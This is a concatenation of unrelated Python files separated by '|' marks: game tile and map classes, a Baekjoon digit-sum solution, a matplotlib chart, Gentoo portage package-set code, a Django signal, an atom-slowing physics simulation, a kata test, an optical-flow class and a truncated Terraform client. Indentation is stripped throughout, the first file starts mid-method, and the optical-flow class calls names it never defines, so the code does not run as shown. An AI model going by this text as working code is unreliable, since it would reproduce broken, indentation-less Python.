if type(player.Character) is ForestCharacter:
return self.BasicMoney
else:
return self.EnemyMoney
class GoldTile(Tile):
def __init__(self, _position):
super().__init__(_position, 150, 150)
def GetMoney(self, player):
return 150
class IceTile(Tile):
def __init__(self, _position):
super().__init__(_position, 50, 100)
def GetMoney(self, player):
if type(player.Character) is IceCharacter:
return self.BasicMoney
else:
return self.EnemyMoney
class SeaTile(Tile):
def __init__(self, _position):
super().__init__(_position, 0, 0)
class SwampTile(Tile):
def __init__(self, _position):
super().__init__(_position, 50, 100)
def GetMoney(self, player):
if type(player.Character) is SwampCharacter:
return self.BasicMoney
else:
return self.EnemyMoney
class Map:
def DetermineTileType(self, X, Y, logic: GameLogic):
if X < 7 and Y < 7 and X+Y < 10:
tile = ForestTile(Vector2(X, Y))
elif Y < 7 and 18 > X > 10 > (17-X) + Y:
tile = IceTile(Vector2(X, Y))
elif X < 7 and 18 > Y > 10 > X + (17 - Y):
tile = DesertTile(Vector2(X, Y))
elif 10 < X < 18 and Y > 10 > (17 - Y) + (17 - X):
tile = SwampTile(Vector2(X, Y))
elif 6 < X < 11 and 6 < Y < 11:
tile = GoldTile(Vector2(X, Y))
else:
tile = SeaTile(Vector2(X, Y))
if X % 17 == 0 and Y % 17 == 0:
# (x + y) in (0, 1, 2, 3)
x = 0 if X == 0 else 1
y = 0 if Y == 0 else 2
if logic.TotalPlayers > x + y:
player = logic.Players[x + y]
tile.Building = BaseBarrack(tile, player)
return tile
def __init__(self, logic):
self._tiles = [
[self.DetermineTileType(x, y, logic) for y in range(0, 18)]
for x in range(0, 18)
]
@property
def TilesIterator(self):
for row in self._tiles:
for tile in row:
yield tile
def GetTile(self, position: Vector2) -> Tile:
return self._tiles[position.X][position.Y]
|
"""
분해합
https://www.acmicpc.net/problem/2231
"""
n = int(input())
data = []
for i in range(n):
sum = 0
for j in str(i):
sum += int(j)
sum += i
if sum == n:
data.append(i)
if len(data) == 0:
print("0")
else:
print(min(data))
|
import matplotlib.pyplot as plt
import numpy as np
divisions = ["Div-a","Div-b","Div-c","Div-d","Div-e"]
divisions_averge_marks = [70,82,73,65,68]
boys_average_marks = [68,67,77,61,70]
index = np.arange(5)
width = 0.30
plt.bar(index,divisions_averge_marks,width,color='green', label = 'Division marks')
plt.bar(index+width,boys_average_marks,width,color = 'blue', label = 'boys marks', bottom=divisions_averge_marks)
plt.title("bar graph")
plt.title("horizontally stacked bả garaph")
plt.xlabel("divisions")
plt.ylabel("marks")
plt.xticks(index+ width/2,divisions)
plt.legend(loc = 'best')
plt.show()
|
# Copyright 2007-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import sys
from portage.dep import Atom, ExtendedAtomDict, best_match_to_list, match_from_list
from portage.exception import InvalidAtom
from portage.versions import cpv_getkey
if sys.hexversion >= 0x3000000:
basestring = str
OPERATIONS = ["merge", "unmerge"]
class PackageSet(object):
# Set this to operations that are supported by your subclass. While
# technically there is no difference between "merge" and "unmerge" regarding
# package sets, the latter doesn't make sense for some sets like "system"
# or "security" and therefore isn't supported by them.
_operations = ["merge"]
description = "generic package set"
def __init__(self, allow_wildcard=False, allow_repo=False):
self._atoms = set()
self._atommap = ExtendedAtomDict(set)
self._loaded = False
self._loading = False
self.errors = []
self._nonatoms = set()
self.world_candidate = False
self._allow_wildcard = allow_wildcard
self._allow_repo = allow_repo
def __contains__(self, atom):
self._load()
return atom in self._atoms or atom in self._nonatoms
def __iter__(self):
self._load()
for x in self._atoms:
yield x
for x in self._nonatoms:
yield x
def __bool__(self):
self._load()
return bool(self._atoms or self._nonatoms)
if sys.hexversion < 0x3000000:
__nonzero__ = __bool__
def supportsOperation(self, op):
if not op in OPERATIONS:
raise ValueError(op)
return op in self._operations
def _load(self):
if not (self._loaded or self._loading):
self._loading = True
self.load()
self._loaded = True
self._loading = False
def getAtoms(self):
self._load()
return self._atoms.copy()
def getNonAtoms(self):
self._load()
return self._nonatoms.copy()
def _setAtoms(self, atoms):
self._atoms.clear()
self._nonatoms.clear()
for a in atoms:
if not isinstance(a, Atom):
if isinstance(a, basestring):
a = a.strip()
if not a:
continue
try:
a = Atom(a, allow_wildcard=True, allow_repo=True)
except InvalidAtom:
self._nonatoms.add(a)
continue
if not self._allow_wildcard and a.extended_syntax:
raise InvalidAtom("extended atom syntax not allowed here")
if not self._allow_repo and a.repo:
raise InvalidAtom("repository specification not allowed here")
self._atoms.add(a)
self._updateAtomMap()
def load(self):
# This method must be overwritten by subclasses
# Editable sets should use the value of self._mtime to determine if they
# need to reload themselves
raise NotImplementedError()
def containsCPV(self, cpv):
self._load()
for a in self._atoms:
if match_from_list(a, [cpv]):
return True
return False
def getMetadata(self, key):
if hasattr(self, key.lower()):
return getattr(self, key.lower())
else:
return ""
def _updateAtomMap(self, atoms=None):
"""Update self._atommap for specific atoms or all atoms."""
if not atoms:
self._atommap.clear()
atoms = self._atoms
for a in atoms:
self._atommap.setdefault(a.cp, set()).add(a)
# Not sure if this one should really be in PackageSet
def findAtomForPackage(self, pkg, modified_use=None):
"""Return the best match for a given package from the arguments, or
None if there are no matches. This matches virtual arguments against
the PROVIDE metadata. This can raise an InvalidDependString exception
if an error occurs while parsing PROVIDE."""
if modified_use is not None and modified_use is not pkg.use.enabled:
pkg = pkg.copy()
pkg.metadata["USE"] = " ".join(modified_use)
# Atoms matched via PROVIDE must be temporarily transformed since
# match_from_list() only works correctly when atom.cp == pkg.cp.
rev_transform = {}
for atom in self.iterAtomsForPackage(pkg):
if atom.cp == pkg.cp:
rev_transform[atom] = atom
else:
rev_transform[Atom(atom.replace(atom.cp, pkg.cp, 1), allow_wildcard=True, allow_repo=True)] = atom
best_match = best_match_to_list(pkg, iter(rev_transform))
if best_match:
return rev_transform[best_match]
return None
def iterAtomsForPackage(self, pkg):
"""
Find all matching atoms for a given package. This matches virtual
arguments against the PROVIDE metadata. This will raise an
InvalidDependString exception if PROVIDE is invalid.
"""
cpv_slot_list = [pkg]
cp = cpv_getkey(pkg.cpv)
self._load() # make sure the atoms are loaded
atoms = self._atommap.get(cp)
if atoms:
for atom in atoms:
if match_from_list(atom, cpv_slot_list):
yield atom
provides = pkg.metadata['PROVIDE']
if not provides:
return
provides = provides.split()
for provide in provides:
try:
provided_cp = Atom(provide).cp
except InvalidAtom:
continue
atoms = self._atommap.get(provided_cp)
if atoms:
for atom in atoms:
if match_from_list(atom.replace(provided_cp, cp),
cpv_slot_list):
yield atom
class EditablePackageSet(PackageSet):
def __init__(self, allow_wildcard=False, allow_repo=False):
super(EditablePackageSet, self).__init__(allow_wildcard=allow_wildcard, allow_repo=allow_repo)
def update(self, atoms):
self._load()
modified = False
normal_atoms = []
for a in atoms:
if not isinstance(a, Atom):
try:
a = Atom(a, allow_wildcard=True, allow_repo=True)
except InvalidAtom:
modified = True
self._nonatoms.add(a)
continue
if not self._allow_wildcard and a.extended_syntax:
raise InvalidAtom("extended atom syntax not allowed here")
if not self._allow_repo and a.repo:
raise InvalidAtom("repository specification not allowed here")
normal_atoms.append(a)
if normal_atoms:
modified = True
self._atoms.update(normal_atoms)
self._updateAtomMap(atoms=normal_atoms)
if modified:
self.write()
def add(self, atom):
self.update([atom])
def replace(self, atoms):
self._setAtoms(atoms)
self.write()
def remove(self, atom):
self._load()
self._atoms.discard(atom)
self._nonatoms.discard(atom)
self._updateAtomMap()
self.write()
def removePackageAtoms(self, cp):
self._load()
for a in list(self._atoms):
if a.cp == cp:
self.remove(a)
self.write()
def write(self):
# This method must be overwritten in subclasses that should be editable
raise NotImplementedError()
class InternalPackageSet(EditablePackageSet):
def __init__(self, initial_atoms=None, allow_wildcard=False, allow_repo=True):
"""
Repo atoms are allowed more often than not, so it makes sense for this
class to allow them by default. The Atom constructor and isvalidatom()
functions default to allow_repo=False, which is sufficient to ensure
that repo atoms are prohibited when necessary.
"""
super(InternalPackageSet, self).__init__(allow_wildcard=allow_wildcard, allow_repo=allow_repo)
if initial_atoms != None:
self.update(initial_atoms)
def clear(self):
self._atoms.clear()
self._updateAtomMap()
def load(self):
pass
def write(self):
pass
class DummyPackageSet(PackageSet):
def __init__(self, atoms=None):
super(DummyPackageSet, self).__init__()
if atoms:
self._setAtoms(atoms)
def load(self):
pass
def singleBuilder(cls, options, settings, trees):
atoms = options.get("packages", "").split()
return DummyPackageSet(atoms=atoms)
singleBuilder = classmethod(singleBuilder)
|
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.dispatch import receiver
from .models import Dprofile
@receiver(post_save,sender=User)
def create_profile(sender, instance, created, **kwargs):
user = instance
if created:
dprofile = Dprofile(user=user)
dprofile.save()
#testing
# Dprofile.objects.create(user=instance)
# instance.dprofile.save()
# @receiver(post_save, sender=User)
# def save_profile(sender, instance, **kwargs):
# instance.dprofile.save()
|
'''
% captured as fn of Col_Gap
'''
import numpy as np
import scipy.stats as sts
import matplotlib.pyplot as plt
import scipy.constants as sc
import scipy.special as scp
import timeit
start = timeit.default_timer()
ymot = 0.008 # Diameter of Col Atoms
G = 38.11e6 # See ln 96
Xi_D = 6.6
Xi_d = 0.15
E0 = 170
aa = 0.15 # Coil Radius
s = 0.11 # Coil Separation
Curr = 0.6805 # Current (16G/cm @ 0.6805)
z0 = 0.24 # Position of MOT centre
z_0 = z0-aa
Satoms = 15000
Ssteps = 140
Sh = 0.000001
h = 0.000012 #Step Size
Natoms = 500
Nsteps = 500
T = 40
r_max = 0.04
Col_zPos = 0
Col_Gap = 0.001
tcc = 0.003
'''If ^ > ymot then simulation is unphysical'''
#J = 10e20
#Q = J*(Col_Gap/2)**2
print('E0, Da, d is {}, {}, {}'.format(E0,Xi_D,Xi_d))
Da = Xi_D*G # Original detuning
d = Xi_d*G # Increment of Detuning
Db,Dc,Dd,De,Df,Dg = Da+d, Da+2*d, Da+3*d, Da+4*d, Da+5*d, Da+6*d
xx = np.linspace(0.000001, 1, 100)
def Sz_initial(Satoms):
'''Initial conditions for z position'''
z0 = np.random.rand(Satoms)
return Col_zPos*z0
def Sy_initial(Satoms):
'''Initial conditions for y position'''
r0 = np.random.rand(Satoms)-0.5
return r_max*r0*2
pm=[]
kb = sc.Boltzmann
MMM= 87*sc.proton_mass
a=abs(np.sqrt((kb*(273+T))/(MMM)))
print('scale, a', a)
#pm_=-1*np.sign(y_initial(Satoms))
def Szy_vel(Satoms,PM):
z0 = np.random.rand(Satoms)
y0 = 1-z0 # vy's share of the random number
Z = sts.maxwell.isf(z0, scale=a)
Y = sts.maxwell.isf(y0, scale=a*np.log(np.pi*abs(y0-0.5))) # *1 no 2 from the e^(sqrt(av**2))
return Z,np.multiply(PM,Y)
def RK4step(ti,zi,vi,h,dv,dz):
k11=dz(ti,zi,vi)
k21=dv(ti,zi,vi)
k12=dz(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21)
k22=dv(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21)
k13=dz(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22)
k23=dv(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22)
k14=dz(ti+h,zi +(h)*k13,vi +(h)*k23)
k24=dv(ti+h,zi +(h)*k13,vi +(h)*k23)
z1=zi+(h/6.0)*(k11+2.0*k12+2.0*k13+k14)
v1=vi+(h/6.0)*(k21+2.0*k22+2.0*k23+k24)
zi = z1
vi = v1
return zi,vi
def Sdv(t,z,v):
return 0
def Sdz(t,z,v):
return v
###########################
def zgen(n):
lin = np.linspace(0,0,n)
return lin
def yrand(n):
ran = np.random.random(n)
return (ran-0.5)*Col_Gap
def MBrand(n):
x = np.random.rand(n)
X = sts.maxwell.isf(x, scale=a)
return X
pm = np.random.rand(Satoms).round(0)
PM = np.power(np.linspace(-1,-1,Satoms),pm) # This gives us a 1d array of +-1 randomly
#v_ = 0.5*(max(MBrand(Natoms))+min(MBrand(Natoms))) #Mean Velocity
sv_ = np.mean(Szy_vel(Satoms, PM)[0])
svy = ((ymot-Col_Gap/2)*sv_)/(z_0**2+(ymot-Col_Gap/2)**2)**0.5
v_ = np.mean(MBrand(Natoms))
vy = ((ymot-Col_Gap/2)*v_)/(z0**2+(ymot-Col_Gap/2)**2)**0.5
def Vyrand(n):
ran = np.random.random(n)
return (ran-0.5)*vy*2
""" Physical & Atomic Constants """
kb = sc.Boltzmann # Boltzmann Constant
mu0 = sc.mu_0 # Vacc Permtivity
muB = 9.2740099*10**-24 # Borh Magnetron
hbar = sc.hbar # hbar
c = sc.c # speed of light
pi = np.pi # pi
u = sc.proton_mass # Proton Mass
M = 87*u # Mass of 87Rb
wab = 2*pi*384.23e12 # Freq of transation
#G = 38.11e6 # Gamma / Rate of SpE
dip = 3.485e-29 # dipole moment
''' Variable Dance '''
Rabi = dip*E0/hbar # Rabi Frequency
IoIs = 2*Rabi**2/G**2 # Intensity / Saturation Intensity
IrE = c*8.85e-12/2*E0**2/10000 # Intensity (This /10000 makes it W/cm^2)
w = wab - Dd # Average Freq of colliding photon
Lambda = 2*pi*c/w # Avg Wavelength
k = 2*pi/Lambda # Average wavenumber of a momentum transfering photon
'''
def MagLeak(z, z0, Curr):
#Mag Field from AntiHlmHltz coils (of center z0 [ >0 ]) that leaks into our slower
x = s/2
ZZ = -z+z0
zz = -ZZ
A,B = ZZ/aa, x/aa
Q = B**2+(1+A)**2
k = (4*A/Q)**0.5
B0 = Curr*sc.mu_0/(2*aa)
K = scp.ellipk(k**2)
E = scp.ellipe(k**2)
Br = 2*B0*(x/ZZ)/(np.pi*Q**0.5)*(E*(1+A**2+B**2)/(Q-4*A)-K)
Bro = np.nan_to_num(Br)
#
A_ = zz/aa
Q_ = B**2+(1+A_)**2
k_ = (4*A_/Q_)**0.5
K_ = scp.ellipk(k_**2)
E_ = scp.ellipe(k_**2)
Br_ = -2*B0*(x/zz)/(np.pi*Q_**0.5)*(E_*(1+A_**2+B**2)/(Q_-4*A_)-K_)
Br_o = np.nan_to_num(Br_)
return Br_o + Bro
'''
def dv(t,z,v):
" The 'complete' Force Equation for a 7 freq 1 dimensional slower inc. magnetic field "
w_a = wab - Da
w_b = wab - Db
w_c = wab - Dc
w_d = wab - Dd
w_e = wab - De
w_f = wab - Df
w_g = wab - Dg
Oa = w_a/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Ob = w_b/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Oc = w_c/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Od = w_d/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Oe = w_e/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Of = w_f/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
Og = w_g/(2*pi*c)#-muB*MagLeak(z, z0, Curr)/hbar
c1a = 1+IoIs+4*Da**2/G**2
c2a = Oa*8*Da/G**2
c1b = 1+IoIs+4*Db**2/G**2
c2b = Ob*8*Db/G**2
c1c = 1+IoIs+4*Dc**2/G**2
c2c = Oc*8*Dc/G**2
c1d = 1+IoIs+4*Dd**2/G**2
c2d = Od*8*Dd/G**2
c1e = 1+IoIs+4*De**2/G**2
c2e = Oe*8*De/G**2
c1f = 1+IoIs+4*Df**2/G**2
c2f = Of*8*Df/G**2
c1g = 1+IoIs+4*Dg**2/G**2
c2g = Og*8*Dg/G**2
c3a = 4*Oa**2/G**2
c3b = 4*Ob**2/G**2
c3c = 4*Oc**2/G**2
c3d = 4*Od**2/G**2
c3e = 4*Oe**2/G**2
c3f = 4*Of**2/G**2
c3g = 4*Og**2/G**2
rhoaa = -(IoIs/2)*(1/(c1a-c2a*v+c3a*v**2)+1/(c1b-c2b*v+c3b*v**2)+1/(c1c-c2c*v+c3c*v**2)+1/(c1d-c2d*v+c3d*v**2)+1/(c1e-c2e*v+c3e*v**2)+1/(c1f-c2f*v+c3f*v**2)+1/(c1g-c2g*v+c3g*v**2))
return rhoaa*hbar*k*G/M
def dz(t,z,v):
return v
""" S O U R C E L O O P """
sY = Sy_initial(Satoms)
sZ = Sz_initial(Satoms)
#print(PM)
sVz, sVy = Szy_vel(Satoms,PM)
zs,vs,ts=[],[],[]
ys,yvs=[],[]
for j in range(Satoms):
vi = sVz[j]
zi = sZ[j]
yvi= sVy[j]
yi = sY[j]
for i in range(Ssteps):
ti=Sh*i
zs.append(zi)
vs.append(vi)
ts.append(ti)
ys.append(yi)
yvs.append(yvi)
z1,v1=RK4step(ti,zi,vi,Sh,Sdv,Sdz)
y1,yv1=RK4step(ti,yi,yvi,Sh,Sdv,Sdz)
yvi,yi,zi,vi = yv1,y1,z1,v1
Y_data = np.reshape(ys, (Satoms,Ssteps))
Vy_data = np.reshape(yvs, (Satoms,Ssteps))
Z_data = np.reshape(zs, (Satoms,Ssteps))
col = []
th = []
n = []
m = []
for j in range(Satoms):
col.append('red')
th.append(0.1)
n.append(0)
m.append(0)
for i in range(Ssteps):
nnn=False
if ( Col_zPos+tcc > Z_data[j][i] > Col_zPos and abs(Y_data[j][i]) < Col_Gap/2 ):
col[j] = 'green'
th[j] = 2.0
n[j] = 1
if ( abs(Vy_data[j][i]) < svy and Col_zPos+tcc > Z_data[j][i] > Col_zPos and abs(Y_data[j][i]) < Col_Gap/2 ):
col[j] = 'cyan'
th[j] = 4.0
m[j] = 1
else:
pass
Nn = np.sum(n)
Mm = np.sum(m)
#leString = " nAtoms = {}\nnSteps/Size={}/{}\n Escaped = {} %\n <vy' = {}%\n Runtime = {}s".format(Satoms, Ssteps,h,round(Nn*100/Satoms,2), round(Mm*100/Satoms,3), round(stop - start, 3))
#BIGString = " Pin Hole Diameter = {}mm \n Ratio of Simulated / Escaped = {}%".format(Col_Gap*1000, round(Mm*100/Nn),3)
print('sRed={}, sGreen={}, sCyan = {}'.format(Satoms-Nn-Mm,Nn,Mm))
# A T O M C O U N T E R i know what I need to do here # # # # # # # # # # # # # # # # # # # # # # # ## # # #
J = 10e20
Q = J*(Col_Gap/2)**2
q = Q*(Mm/Satoms)
print('q , Q =',q,Q)
plt.close('all')
fig = plt.figure()
ax1 = plt.subplot2grid((2,1), (0,0))#, rowspan=2)
ax2 = plt.subplot2grid((2,1), (1,0), sharex=ax1)
""" P L O T & C A P T U R E L O O P """
zlin=zgen(Natoms)
yran = yrand(Natoms)
Vyran = Vyrand(Natoms)
vran = MBrand(Natoms)
zsC,vsC,tsC=[],[],[]
ysC,yvsC=[],[]
"""this loop goes through all the atoms we've got and applies the force dv to them for a number of steps, Nsteps"""
for j in range(Natoms):
viC = vran[j]
ziC = zlin[j]
yviC= Vyran[j]
yiC = yran[j]
for i in range(Nsteps):
tiC=h*i
zsC.append(ziC)
vsC.append(viC)
tsC.append(tiC)
ysC.append(yiC)
yvsC.append(yviC)
z1C=RK4step(tiC,ziC,viC,h,dv,dz)[0]
v1C=RK4step(tiC,ziC,viC,h,dv,dz)[1]
y1C=RK4step(tiC,yiC,yviC,h,Sdv,Sdz)[0]
yv1C=RK4step(tiC,yiC,yviC,h,Sdv,Sdz)[1]
yviC = yv1C
yiC = y1C
ziC = z1C
viC = v1C
Y = np.reshape(ysC, (Natoms,Nsteps))
V = np.reshape(vsC, (Natoms,Nsteps))
Z = np.reshape(zsC, (Natoms,Nsteps))
tt = np.array(tsC)
thet = np.split(tt, Natoms)[1]
Top, Thicc = 0.002, 0.003
ax1.bar(Col_zPos, Top, Thicc, bottom= Col_Gap/2, color='k')
ax1.bar(Col_zPos,-Top, Thicc, bottom=-Col_Gap/2, color='k')
#print(Y, Y.shape)
''' Collimation Collision Detection '''
'''nn=0
for j in range(Natoms):
for i in range(Nsteps):
if (Z[j][i] < Col_zPos and abs(Y[j][i]) > Col_Gap/2):
Y[j],Z[j] = np.linspace(0,0,Nsteps), np.linspace(0,-0.01,Nsteps)
nn += 1
'''
''' Capture Detection '''
z_ , z__ = z0 - ymot, z0 + ymot
y_ = 0.01
capV, capv = 50,15
n_ = []
for j in range(Natoms):
for i in range(Nsteps):
if (z_ < Z[j][i] < z__ and abs(Y[j][i]) < ymot and abs(V[j][i]) < capV):
#Y[j],Z[j] = np.linspace(0,0,Nsteps), np.linspace(0,0.0001,Nsteps)
nnn = 2
n_ = np.append(n_, nnn)
else:
nnn = 0
n_ = np.append(n_, nnn)
N = np.reshape(n_, (Natoms, Nsteps))
#print(n_)
#rint(N)
N0 = 0
for j in range(Natoms):
NN = False
for i in range(Nsteps):
if N[j][i] == 2:
NN = True
if NN == True:
N0 += 1
print(N0)
for i in range(Natoms):
'A plot for each of the Natoms particles'
th = 0.5
col = (0.1, float(i/(Natoms+1)+0.0001), 1-float(i/(Natoms+5)+0.0001))
ax1.plot(Z[i],Y[i],linewidth=th, color = col)
ax2.plot(Z[i],V[i],linewidth=th, color = col)
ax1.axhspan(-ymot/2,ymot/2, alpha=0.05, color='green')
ax1.axvspan(z0-0.01,z0+0.01, alpha=0.05, color='purple')
ax1.axvline(x = z0 - aa, color = 'k', linestyle='dotted')
ax1.axvline(x = z0, color = 'k', linestyle='dashed')
ax1.axvline(x = z0-0.01, color = 'r')
ax1.axvline(x = z0+0.01, color = 'r')
ax1.axhline(y = ymot/2, color = 'r')
ax1.axhline(y = -ymot/2, color = 'r')
ax1.set_ylim(top = 2*ymot, bottom = -2*ymot)
ax2.axvspan(z0-0.01,z0+0.01, alpha=0.05, color='purple')
ax2.axhspan(-capV,capV, alpha=0.05, color='b')
ax2.axhspan(-capv,capv, alpha=0.05, color='red')
ax2.axvline(x = z0 - aa, color = 'k', linestyle='dotted')
ax2.axvline(x = z0, color = 'k', linestyle='dashed')
ax2.axvline(x = z0-0.01, color = 'r')
ax2.axvline(x = z0+0.01, color = 'r')
ax2.axhline(y = capv, color = 'r')
ax2.axhline(y = -capv, color = 'r')
ax2.set_xlim(left=-0.009, right=z0+1*aa)
ax2.set_ylim(top=350, bottom=-20)
fig.subplots_adjust(hspace=0) # Makes the plots that share the
# # same x axis on top of each other
ax1.set_ylabel("y coordinate / m", size = 17)
ax2.set_ylabel("Velocity / ms`'", size = 17)
#ax3.set_title('Multi-Frequency Slowing Simulation: $\it{7}$ $\it{Frequencies}$, $\it{MOT}$ $\it{Magnetic}$ $\it{Field}$', size=17)
ax1.set_title('7-Frequency: Total Loading Fraction', size=20)
ax2.set_xlabel('Distance / m', size = 18)
#ax1.set_yticks(np.arange(-0.002, 0.002, step=0.0005))
q_pc = q*N0/Natoms
#Q_pc = q_pc/(1-np.cos(np.arctan(vy/v_)))
print('Total Flux % =', q_pc/Q * 100)
'''Slope Finding'''
'''
LenLin,dd = 1000, 0.03
LinGrad = np.linspace(z0-dd, z0+dd, LenLin)
Bp = MagLeak(LinGrad,z0,Curr)[0]
Bm = MagLeak(LinGrad,z0,Curr)[LenLin-1]
ax4.plot(LinGrad, MagLeak(LinGrad, z0, Curr)*1000, color='cyan', lw=0.5)
Grad = abs(Bp-Bm)/(2*dd)
'''
from datetime import date
today = date.today()
d4 = today.strftime("%d-%b-%Y")
stop = timeit.default_timer()
#print("d4 =", d4)
#ax3.legend(title=' {}\nIntensity = {}W/cm2\nDetuning = {} w/ Increment {}MHz\nE0 = {} no. atoms = {} \nLength of Tube = {}cm\nMag Field Gradient = {}G/cm'.format(d4,round(IrE, 3),Da/1000000,d/1000000,E0,nj, round((z0-aa)*100,3),round(Grad*1000000,2), loc=2, prop={'size': 18}))
stop = timeit.default_timer()
Ustr = 'Pinhole Diameter = {}mm\n Captured / Released = {}%\n Loading Rate = N/A'.format(Col_Gap*1000,round(N0*Mm/(Ssteps*Nn)*100,4))
ustr = 'E0 = {} D = {} d = {}\n\n#Rb = {}\nEscaped = {}\nReasonable = {}\n\n#Simmed = {}\nCaptured = {}\n\nTube = {}cm\n Mag Field Grad = N/A G/m\n\nRuntime = {}\n {}'.format(E0,Xi_D,Xi_d, Satoms,Nn,Mm, Natoms,N0, z_0*100, round(stop - start, 3),d4)
ax2.text(z0+0.04,20,ustr, fontsize=19, bbox = dict(boxstyle='round', fc=(0.79,0.98,0.6), alpha=0.4))
ax1.text(z0+0.03,-1.6*ymot,Ustr,fontweight='bold',fontsize=23, bbox = dict(boxstyle='round', fc=(0.99,0.87,0.12), alpha=0.5))
print('Velocity Range = [{},{}]'.format(round(min(vran),1),round(max(vran),1)))
print('# Particles = {}'.format(Natoms))
print('Beam Intensity = {}W/cm^2'.format(round(IrE, 3)))
print('Run Time =',round(stop - start, 3),'sec')
print('vy = {}m/s'.format(vy))
#print('Flux ')
plt.show()
|
import unittest
from katas.kyu_7.find_the_capitals import capitals
class CapitalsTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(capitals('CoDeWaRs'), [0, 2, 4, 6])
|
import cv2
import numpy as np
from src.image.utils import rgb2gray
from src.video.video_reader import AviReader
from src.image.utils import uv_2_motion_vector
from src.image.utils import draw_motion_vectors
from src.image.horn_schunk import HornSchunkFrame
class HS_Estimate:
def __init__(self,alpha,num_iter,video_path=None):
if video_path is None:
raise Exception("Please enter path for video")
self.video_path = video_path
self.alpha = alpha
self.num_iter = num_iter
self.reader = None
self.num_frames = None
self.hs_estimator = None
self.motion_vectors = []
self.matched_frames = []
self.vector_added_frames = []
self.vector_field_frames = []
self.loss = []
self.reset_state(video_path,alpha=alpha,num_iter=num_iter)
def _init_frames(self,path=None):
if path is None:
path = self.video_path
self.reader = AviReader(path, mode="np")
self.num_frames = len(self.reader)
def _init_hs_estimator(self,alpha=None,num_iter=None):
if alpha is None:
alpha = self.alpha
if num_iter is None:
num_iter = self.num_iter
self.hs_estimator = HornSchunkFrame(alpha=alpha, num_iter=num_iter)
def reset_state(self,path=None,alpha=None,num_iter=None):
self._init_frames(path=path)
self._init_hs_estimator(alpha=alpha,num_iter=num_iter)
def match_with_original(self):
for frame in range(self.num_frames-1):
print("Working on frame:{}".format(frame + 1))
anchor_frame = self.reader[frame]
next_frame = self.reader[frame+1]
anchor_frame = rgb2gray(anchor_frame)
next_frame = rgb2gray(next_frame)
u, v = self.hs_estimator(anchor_frame, next_frame)
matched_img = block_swap(block_pairs=matched_pairs, anchor=anchor_frame)
vector_image = np.copy(matched_img)
vector_image = np.copy(matched_img)
vectors = uv_2_motion_vector(u=u,v=v)
vector_image = draw_motion_vectors(image=vector_image, u=u,v=v, color=(255, 255, 255), thickness=1)
self.motion_vectors.append(vectors)
self.matched_frames.append(matched_img)
self.vector_added_frames.append(vector_image)
self.loss.append(image_mse(img1=matched_img, img2=next_frame))
def save_results(self,save_path):
save_path = "../"+save_path+"/"
len_results = len(self.matched_frames)
size = (self.matched_frames[0].shape[1],self.matched_frames[0].shape[0])
fourcc = cv2.VideoWriter_fourcc(*'XVID')
video_writer = cv2.VideoWriter(save_path+"output_video.avi",fourcc,20.0,size,0)
for res in range(len_results):
frame = self.matched_frames[res]
frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)
video_writer.write(frame)
cv2.imwrite(save_path + "matched_frame_" + str(res) + ".jpg", self.matched_frames[res])
cv2.imwrite(save_path+"vector_frame_"+str(res)+".jpg",self.vector_added_frames[res])
video_writer.release()
with open(save_path+"loss.txt", "w") as file:
file.write(str(self.loss)+"\n")
file.close()
with open(save_path+"vectors.txt", "w") as file:
for im_idx,im_vectors in enumerate(self.motion_vectors):
for vec_idx,vector in enumerate(im_vectors):
print("Writing Frame:{} Vector:{}".format(im_idx,vec_idx))
file.write("Frame No:{} Vector No:{} Start:{} End:{}".format(im_idx,vec_idx,vector.start,vector.end))
file.write("\n")
file.close()
|
# -*- coding: utf-8 -*-
import io
import json
import yaml
import os
import glob
import datetime
import petname
from django import forms
import python_terraform
from pydot import graph_from_dot_data
from architect.manager.client import BaseClient
from celery.utils.log import get_logger
logger = get_logger(__name__)
relation_mapping = {
'tf_openstack_compute_instance_v2-tf_openstack_compute_keypair_v2': 'using_tf_key_pair',
'tf_openstack_networking_subnet_v2-tf_openstack_networking_network_v2': 'in_tf_net',
'tf_openstack_compute_floatingip_associate_v2-tf_openstack_networking_floatingip_v2': 'links_tf_floating_ip',
'tf_openstack_networking_floatingip_v2-tf_openstack_networking_router_interface_v2': 'links_tf_floating_ip',
'tf_openstack_networking_router_interface_v2-tf_openstack_networking_subnet_v2': 'in_tf_subnet',
'tf_openstack_networking_router_interface_v2-tf_openstack_networking_router_v2': 'links_tf_router',
'tf_openstack_compute_instance_v2-tf_openstack_networking_network_v2': 'in_tf_net',
'tf_openstack_compute_floatingip_associate_v2-tf_openstack_compute_instance_v2': 'links_tf_floating_instance',
'tf_openstack_compute_instance_v2-tf_openstack_compute_secgroup_v2': 'has_tf_security_group',
}
DEFAULT_RESOURCES = [
'tf_template',
'tf_state',
# 'tf_resource',
]
class TerraformClient(BaseClient):
def __init__(self, **kwargs):
super(TerraformClient, self).__init__(**kwargs)
def auth(self):
return True
def check_status(self):
if os.path.isdir(self.metadata['template_path']):
return True
else:
return False
def _clean_name(self, name):
return name.replace('"', '').replace('[root] ', '').strip()
def update_resources(self, resources=None):
if self.auth():
if resources is None:
resources = DEFAULT_RESOURCES
for resource in resources:
metadata = self.get_resource_metadata(resource)
self.process_resource_metadata(resource, metadata)
count = len(self.resources.get(resource, {}))
logger.info("Processed {} {} resources".format(count,
resource))
self.process_relation_metadata()
def get_resource_status(self, kind, metadata):
if not isinstance(metadata, dict):
return 'unknown'
if kind == 'tf_template':
if metadata.get('status', None) == True:
return 'active'
if metadata.get('status', None) == False:
return 'error'
elif kind == 'tf_state':
if metadata.get('states', [{'state': None}])[0].get('state', None) is None:
return 'build'
return 'active'
return 'unknown'
def get_resource_metadata(self, kind, uid=None):
logger.info("Getting {} resources".format(kind))
response = {}
if kind == 'tf_template':
path = self.metadata['template_path']
if uid is None:
templates = glob.glob('{}/*'.format(path))
else:
templates = ['{}/{}'.format(path, uid)]
for template in templates:
resource = []
variable = []
